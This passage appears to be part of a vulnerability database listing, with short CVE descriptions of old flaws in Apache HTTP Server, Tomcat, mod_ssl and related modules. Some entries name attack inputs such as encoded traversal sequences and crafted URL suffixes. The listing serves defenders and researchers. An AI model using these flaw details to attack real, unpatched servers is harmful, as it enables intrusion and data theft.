5167| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
5168| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
5169| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
5170| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
5171| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
5172| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
5173| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
5174| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child process IDs (PID).
| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using an AuthNonce secret.
| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to bypass intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
| [CVE-2001-1013] Apache on Red Hat Linux with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.
| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary directories via the PROPFIND HTTP request method.
| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
5311| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
5312| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
5313| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
5314| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
